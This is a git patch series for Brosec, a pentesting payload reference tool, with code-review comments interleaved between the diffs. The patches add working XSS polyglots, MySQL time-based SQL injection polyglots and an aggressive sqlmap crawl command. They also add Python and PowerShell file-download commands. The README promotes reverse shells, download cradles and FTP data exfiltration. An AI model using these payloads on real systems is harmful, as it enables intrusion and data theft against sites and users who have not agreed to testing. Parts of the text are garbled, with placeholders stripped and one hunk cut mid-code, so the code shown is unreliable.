@@ -1,5 +1,5 @@ var dirty = require('dirty'); -var settings = require('./settings.js'); +var settings = require('../modules/settings.js'); var os = require('os'); // By default, brosec stores its data file in /var/tmp // Change storage location by altering settings.js From be2a0df68507040fe754668056a55d8dbb56ed45 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Sat, 30 Jul 2016 14:31:38 -0400 Subject: [PATCH 18/18] Release for v1.1.1 --- CHANGELOG.md | 20 ++++++++--- README.md | 76 ++++++++++++++-------------------------- modules/colorize.js | 29 +++++++++++---- modules/output.js | 10 +++++- modules/questionUser.js | 5 +-- modules/secondaryMenu.js | 2 +- payloads/misc.js | 5 +-- payloads/web.js | 38 ++++++++++++++++++-- payloads/windows.js | 3 +- 9 files changed, 117 insertions(+), 71 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index a5f5ab8..f810acf 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md 
@@ -1,21 +1,31 @@ # ChangeLog -## 1.1.0a _(July 23, 2016)_ +## Major Release 1.1.1 _(July 30, 2016)_ +- Features + - Full Windows Support added + - Better documentation added to the new [wiki](https://github.com/gabemarshall/Brosec/wiki) + - Simplified install process. Once you have nodejs installed just run ```npm install -g Brosec``` + - ```bros encode``` module added (realtime encoder/decoder) + - ```bros ftp``` now supports auth via ```--username``` and ```--password``` parameters. + - New SQLi Polyglots added to ```bros 43``` + - New XSS payloads ```bros 42``` + - (```bros 424``` Credit to [@0xsobky](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)) - Dependencies - - Removed kexec dependency that was used to run netcat listeners (replaced by ```modules/nc.js```) + - Removed kexec dependency that was used to run netcat listeners (replaced by ```modules/nc.js```) -- this greatly reduces the complexity of Brosec and makes it easier to install. - Bug fixes + - Lots and lots of bug fixes...and probably new bugs introduced ;p -## 0.2b _(Feb 16, 2016)_ +## 1.0.2b _(Feb 16, 2016)_ - Features - `bros update` - Convenience module that check for updates via git, pull if any updates are found, and installs any new dependencies. -## 0.2a _(Feb 15, 2016)_ +## 1.0.2a _(Feb 15, 2016)_ - Features - `bros clean` @@ -23,7 +33,7 @@ - Minor performance improvements throughout Brosec -## 0.2 _(Feb 5, 2016)_ +## 1.0.2 _(Feb 5, 2016)_ - Features - `bros ftp` diff --git a/README.md b/README.md index 6136595..a92a529 100644 --- a/README.md +++ b/README.md 
@@ -6,69 +6,53 @@ Overview (tl;dr) Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec's most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard. -Assuming the user has already set up the required variables (read on to learn how) a reverse shell using the awk command can be generated as easy as... +Assuming the user has already set up the required variables (see the [Getting Started](https://github.com/gabemarshall/Brosec/wiki/Getting-Started) section of the wiki) a reverse shell using the awk command can be generated as easy as... [![asciicast](https://asciinema.org/a/2okrjipq4zt8669rb9n54xneg.png)](https://asciinema.org/a/2okrjipq4zt8669rb9n54xneg) -#### Payload Variables +Or maybe you need to remotely invoke a Powershell script? A download cradle can be generated like so. -Brosec allows you to store and retrieve values (in a local json db) for several variables in order to make command/payload generation easier. While some payloads will already include these variables, you can also include them in any payload that prompts for user input. +[![asciicast](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc.png)](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc) -For example, the following shows how a Powershell download cradle can be generated using the LHOST and LPORT variables (the values of which had already been set). 
-[![asciicast](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc.png)](https://asciinema.org/a/c2793p8lzzvla8pqji29snyvc) +##### Additional Features and Usage Examples -##### Available variables -- LHOST : Local IP or name -- LPORT : Local IP or name -- RHOST : Remote IP or name -- RPORT : Remote IP or name -- USER : Username (only used in a few payloads) -- PROMPT : User Prompt (This isn't a stored value. Instead, payloads with this variable will prompt for input.) +###### [Bros http(s)](https://github.com/gabemarshall/Brosec/wiki/bros-http) +Need a quick web server? Forget python SimpleHTTPServer, bros has your back with `bros http` when entered via the command line. An SSL server? `bros https` has you covered. + +![](http://i.imgur.com/47BHim4.gif)
+###### [Bros FTP](https://github.com/gabemarshall/Brosec/wiki/bros-ftp) +Need to exfiltrate some data via ftp? Bros comes with a handy `bros ftp` when entered via the command line. The ftp server accepts anonymous downloads/uploads from the CWD (so be careful when running). -![](http://i.imgur.com/FCateZJ.gif) -
Above are multiple examples of how to access and set the stored configuration variables. -- Configuration variables can be viewed via the `config` command at any time, or by entering the variable name -- Variables can be changed at any time by entering `set ` -- You can also navigate to frequently used payloads by entering the menu sequence from the command line: `bros ` - - Ex: `bros 413` - This would automate entering 4 for the Web Menu, 1 for the XXE sub menu, and 3 for the XXE local file read payload -
+###### [Bros Encode](https://github.com/gabemarshall/Brosec/wiki/bros-encode) -
-##### Additional Features and Usage Examples -###### XXE for Bros -![](http://i.imgur.com/hxrqlvk.gif) -
-In addition to payloads such as reverse shells, Brosec also has multiple XXE payloads that you can generate on the fly. -

+A realtime encoder/decoder utility designed with web pentesters in mind that often find the need to encode and decode various payloads. + +![](http://i.imgur.com/wxFpA7o.png) + + +Learn about these features and more on the [Brosec wiki](https://github.com/gabemarshall/Brosec/wiki). -###### Simple HTTP(s) Server -Need a quick web server? Forget python SimpleHTTPServer, bros has your back with `bros http` when entered via the command line. An SSL server? `bros https` has you covered. -![](http://i.imgur.com/47BHim4.gif) -
-###### Anonymous FTP Server -Need to exfiltrate some data via ftp? Bros comes with a handy `bros ftp` when entered via the command line. The ftp server accepts anonymous downloads/uploads from the CWD (so be careful when running). Installation ============ ### [Releases](https://github.com/gabemarshall/Brosec/releases) -*Some features are unavailable in the compiled version, but is a good way to quickly try out Brosec* -### Manual installation +### Mac + +#### Quick Installation -#### Mac +- `brew install node` - Install Nodejs (or download installer from https://nodejs.org/en/download/) +- `npm install -g Brosec` - Install Brosec (may need sudo to symlink to /usr/local/bin) -- `brew install node` - Install Nodejs -- `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo -- `cd Brosec && npm install` - cd into the directory and install npm depdendencies #### Kali Linux @@ -78,22 +62,13 @@ Installation - `n latest` Install latest version of nodejs -- `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo -- `cd Brosec && npm install` - cd into the directory and install npm depdendencies +- `npm install -g Brosec` - Install Brosec (may need sudo to symlink to /usr/local/bin) ### Windows (Unsupported) -- Install [nodejs](https://nodejs.org/download) -- `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo - - -#### Optional -Add bros directory path to your PATH env variable, create a symlink for the bros file, etc - -Configuration -===================== +- Install via official installer [nodejs](https://nodejs.org/download) +- `npm install -g Brosec` - Install Brosec -Brosec stores configuration values in a local json db file. The default storage location is /var/tmp, but can be changed by editing settings.dbPath variable in the settings.js file. Swag 
@@ -113,5 +88,6 @@ Brosec was heavily inspired by the Red Team Field Manual by Ben Clark. In additi - [pentestmonkey reverse shells](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) - [g0tmi1k linux privesc](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) - [obsecuresecurity](http://obscuresecurity.blogspot.com/2014/05/dirty-powershell-webserver.html) +- [SecLists](https://github.com/danielmiessler/SecLists) Special thanks to [@LuxCupitor](https://twitter.com/LuxCupitor) diff --git a/modules/colorize.js b/modules/colorize.js index 0079c24..ce0193d 100644 --- a/modules/colorize.js +++ b/modules/colorize.js @@ -2,7 +2,7 @@ var log = require('cli-color'); exports.samples = function(sample){ - var doesSampleContainPrompt = sample.match(/((<(PROMPT)\s*?.*?>))/) + var doesSampleContainPrompt = sample.match(/((<(PROMPT)\s*?.*?>))/gi) var doesSampleContainRemote = sample.match(/((<(RHOST)\s*?.*?>))/) var doesSampleContainRemotePort = sample.match(/((<(RPORT)\s*?.*?>))/) var doesSampleContainLocal = sample.match(/((<(LHOST)\s*?.*?>))/) @@ -10,14 +10,31 @@ exports.samples = function(sample){ var doesSampleContainUser = sample.match(/((<(USER)\s*?.*?>))/) var doesSampleContainPath = sample.match(/((<(PATH)\s*?.*?>))/) - function addSomeColor(val, color){ - var temp = sample.split(val[0]) - var final = temp[0]+color(val[0])+temp[1] + function replaceAll(str, find, replace) { + return str.replace(new RegExp(find, 'g'), replace); + } + + function addSomeColor(val, color, debug){ + + if (val.length > 1){ + for (b=0;b))/gi, userResponse) + var t = JSON.parse(userResponse) + if (t.length > 1){ + for (i=0;i))/i, t["+i+"])"); + } + } else { + payload = payload.replace(/((<(PROMPT)\s*?.*?>))/gi, t[0]); + } + } else { tmenu() return diff --git a/modules/questionUser.js b/modules/questionUser.js index e865430..7d1fa9e 100644 --- a/modules/questionUser.js +++ b/modules/questionUser.js 
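Review bot: The multi-PROMPT loop added to `output.prepare` appears to build the replace statement as a string with the loop index spliced in (`t["+i+"])")` survives in this view, the call around it was garbled by extraction) and evaluate it; there is no need to generate code — `payload.replace(/((<(PROMPT)\s*?.*?>))/i, ...)` with `t[i]` does the same thing, and `i` should be declared with `var` rather than leaking as a global. Separately, passing the user's answer as a string replacement lets `String.prototype.replace` interpret `$&`, `$1`, `$'` and friends, which are common in shell and regex payloads; supply the answer through a function so it is inserted literally. The `else` branch collapses into the same loop, as below; the rest of prepare is outside this hunk, and this file's diff header was lost in this view.
```javascript
var t = JSON.parse(userResponse);
for (var i = 0; i < t.length; i++) {
    payload = payload.replace(/((<(PROMPT)\s*?.*?>))/i, function () { return t[i]; });
}
// … unchanged: LHOST/LPORT/RHOST/RPORT substitution …
```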
@@ -6,7 +6,7 @@ var prompt = require('prompt'), db = require('../db/db'), currentOS = os.type(), netcat = require('./nc'), - finalAnswer + finalAnswer = []; exports.http = function(callback) { prompt.message = "Should I fire up a web server for you? (Y/n) :" @@ -113,7 +113,7 @@ exports.some = function(question, callback, type) { if (err) { console.log(err); } else { - finalAnswer = result._; + finalAnswer.push(result._); temp += 1; } @@ -138,6 +138,7 @@ exports.some = function(question, callback, type) { clearInterval(checkStatus); // If the last question is a string, send output to final parsing if (typeof(question[temp - 1]) === "string") { + finalAnswer = JSON.stringify(finalAnswer); callback(finalAnswer); } } diff --git a/modules/secondaryMenu.js b/modules/secondaryMenu.js index 721d252..1f6702d 100644 --- a/modules/secondaryMenu.js +++ b/modules/secondaryMenu.js @@ -175,7 +175,7 @@ var Menu = function(title, menuOptions, payloadType) { var menus = {} var infoGMenu = new Menu("--[ Information Gathering ]--", ["DNS", "Port Scanning", "SMB", "SNMP"], pay.infog); -var webMenu = new Menu("--[ Web ]--",["XML", "SQLi"], pay.web) +var webMenu = new Menu("--[ Web ]--",["XML", "XSS", "SQLi"], pay.web) var miscMenu = new Menu('--[ Miscellaneous ]--', ["Reverse Shells", "Exfiltration"], pay.misc) var linuxMenu = new Menu('--[ Linux ]--', ["System Info", "File System", "Networking", "Stealth", "Privesc"], pay.linux) var windowsMenu = new Menu('--[ Windows ]--', ["System Info", "File System", "Networking", "WMIC", "Powershell", "Windows Registry"], pay.windows) diff --git a/payloads/misc.js b/payloads/misc.js index 174dcf1..84c66d5 100644 --- a/payloads/misc.js +++ b/payloads/misc.js 
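Review bot: `finalAnswer` is now a module-level array that `exports.some` pushes into and then overwrites with `JSON.stringify(finalAnswer)`, so after one run the variable holds a string: if `some()` runs again in the same process the next `finalAnswer.push` throws, and without the stringify step earlier answers would be carried into the next run. `ncatReceiveFile` (context in an earlier hunk of this series) still does `finalAnswer.replace(/(\/)/g, "_")` on it, which, if it runs after `some()` completes, now yields a file name like `["script.sh"]` with the JSON brackets and quotes. Reset at the start of `some()` with `finalAnswer = [];` and pass the callback a copy, `callback(JSON.stringify(finalAnswer));`, without reassigning the module variable, then have ncatReceiveFile read the first element. exports.some starts before this hunk.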
@@ -112,10 +112,11 @@ Load({
 Load({
 title: "Download File via Python",
- payload:'python -c \'import urllib;urllib.urlretrieve ("http://:/","");\'',
+ payload:'python -c \'import urllib;urllib.urlretrieve ("","");\'',
 category: "Exfiltration",
 callback: function(bro){
- question("What file would you like to download? (ex: script.sh)");
+ question("What would you like to download? (ex: http://foo.bar/script.sh)");
+ question("Where would you like to save it? (ex: /tmp/script.sh)");
 ask.some(questions, bro);
 }
 })
diff --git a/payloads/web.js b/payloads/web.js
index 8e06499..898333a 100644
--- a/payloads/web.js
+++ b/payloads/web.js
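Review bot: The command this payload generates relies on `urllib.urlretrieve`, which exists only in Python 2 (Python 3 moved it to `urllib.request.urlretrieve`), so the entry should say which interpreter it targets, e.g. `title: "Download File via Python 2",`, or the one-liner should be written to run on both. The two new prompts feed answers into a double-quoted Python string nested inside a single-quoted shell string; assuming the answers are substituted verbatim (the placeholders appear stripped in this rendering and the substitution code is not in this hunk), an answer containing `"`, `'` or `;` yields a command that fails to parse, which the prompt text or a short comment above the `Load` could state.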
@@ -97,30 +97,62 @@ Load({
 category: "XML"
 })
+// ####### XSS ##########
+
+Load({ payload: "'';!--\"=&{()}", title: "Test string to see how data is being filtered/escaped.", category: "XSS"})
+Load({ payload: "-->\">'>", title: "XSS Polyglot injecting into HTML", category: "XSS"})
+Load({ payload: "';alert(1)//\';alert(2)//\";alert(3)//\\\";alert(4)//-->\">'>=&{}", title: "XSS Polyglot injecting into JS", category: "XSS"})
+
+// Credit to https://twitter.com/0xsobky
+Load({ payload: "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\\x3csVg/\\x3e", title: "XSS polyglot locator", category: "XSS"})
+
+
 // ####### sqlmap #########
+Load({ payload: "SLEEP() /*' or SLEEP() or '\" or SLEEP() or \"*/", title: "SQLi Polyglot", category: "SQLi",
+callback: function(bro){
+ question("How many seconds would you like to sleep for?");
+ ask.some(questions, bro);
+}})
+
+// Credit to Detectify https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/
+Load({ payload: "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|\"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR\"*/", title: "SQLi (MySQL) Polyglot", category: "SQLi"})
+
+
+Load({
+ title: "Use sqlmap to crawl and scan for SQLi",
+ payload: "sqlmap -u '' --forms --batch --crawl=10 --level=5 --risk=3 --cookie=''",
+ category: "SQLi",
+ callback: function(bro){
+ question("What URL would you like to scan?");
+ question("What cookies would you like to include?");
+ ask.some(questions, bro);
+ }
+})
+
 Load({
 title: "Use sqlmap to directly connect to an Oracle db (requires Oracle instant client)",
- payload: "sqlmap -d 'oracle://@:/'",
+ payload: "sqlmap -d 'oracle://@:/'",
 category: "SQLi",
 callback: function(bro){
 question("What DB credentials would you like to use? (Enter as username:password)");
+ question("Whats the SID of the DB? (ex: testdb)");
 ask.some(questions, bro);
 }
 })
 Load({
 title: "Use sqlmap to directly connect to a MySQL db",
- payload: "sqlmap -d 'mysql://@:/'",
+ payload: "sqlmap -d 'mysql://@:/'",
 category: "SQLi",
 callback: function(bro){
 question("What DB credentials would you like to use? (Enter as username:password)");
+ question("Whats the name of the DB? (ex: testdb)");
 ask.some(questions, bro);
 }
 })
-// sqlmap -d "mysql://:@:/"
 /* ######################################################
diff --git a/payloads/windows.js b/payloads/windows.js
index 512499b..0d82c37 100644
--- a/payloads/windows.js
+++ b/payloads/windows.js
@@ -157,10 +157,11 @@ Load({
 Load({
 title: "Download File",
- payload: '(new-object system.net.webclient).downloadFile("","")',
+ payload: '(new-object system.net.webclient).downloadFile("","")',
 category: "Powershell",
 callback: function(bro){
 question("What is the full URI path of the hosted file? (ex: http://foo.bar/bro.zip)")
+ question("Where would you like to save it? (ex: C:\\TEMP\\bro.zip)");
 ask.some(questions, bro);
 }
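Review bot: The new XSS and polyglot `Load` calls in the `@@ -97,30 +97,62 @@` hunk are written as single-line object literals, and the SQLi Polyglot entry puts `callback: function(bro){` at column 0 and closes with `}})`, while every other entry in this file — including the Oracle and MySQL blocks touched in the same hunk — uses one property per line with the callback indented inside the object; formatting the new entries the same way keeps the long payload strings readable and the file consistent. The two added prompts also drop the apostrophe: `question("What's the SID of the DB? (ex: testdb)");` and `question("What's the name of the DB? (ex: testdb)");`. Since the placeholders inside the payload strings appear stripped in this rendering, a one-line comment above each entry that takes several answers, stating which prompt fills which placeholder in order, would document the contract the `ask.some(questions, bro)` call depends on.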